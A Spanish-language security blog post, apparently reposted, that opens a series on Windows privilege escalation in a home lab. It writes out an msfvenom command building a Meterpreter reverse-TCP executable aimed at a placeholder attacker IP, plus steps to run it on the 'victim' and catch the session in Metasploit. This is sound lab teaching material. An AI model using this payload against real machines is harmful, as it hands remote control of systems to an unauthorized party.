Escalar privilegios en Windows con y sin exploits

La siguiente serie de post desarrollado por Eric Balderrama surge de dos disparadores, uno de ellos fue un comentario sobre la dificultad para escalar privilegios en la vm del desafío que presentamos como finalización de la serie de penetration with kali. El segundo, leer en un writeup sobre un script llamado linuxprivchecker.py, con lo cual decidí buscar más información sobre el proceso de escalación de privilegios para mejorar mis skills y compartirlo a modo de resumen.

Para estas entradas necesitaremos un Windows (el que quieran o tengan a mano) con dos o más usuarios creados, uno de ellos con privilegios de administrador y una máquina atacante que en mi caso utilizaréDebian + Katoolin.


 
 
Como los siguientes post se tratan sobre escalamiento de privilegios, pasaremos por alto la etapa de obtener acceso al sistema. A modo de recomendación, para llevar a cabo estos ejemplos sin muchas complicaciones, pueden crearse un .exe desde msfvenom y correrlo en el equipo víctima de la siguiente manera:
msfvenom -p windows/metertpreter/reverse_tcp LPORT={puerto}
LHOST={Dirección ip atacante} -f exe > shell.exe

Luego levantan un handler en Metasploit con el mismo Payload, pasan el .EXE a la víctima y ejecutan. De esa manera obtendrán sesión en el Meterpreter.
Fuente: SeguInfo

Comentarios

Entradas populares de este blog

Presuntos narcotraficantes liberados por un ransomware

Metasploit y Windows 10: Creando un payload indetectable (Evadiendo software antivirus)

Diferencias entre mapa de calor, mapa de riesgos y matriz de riesgos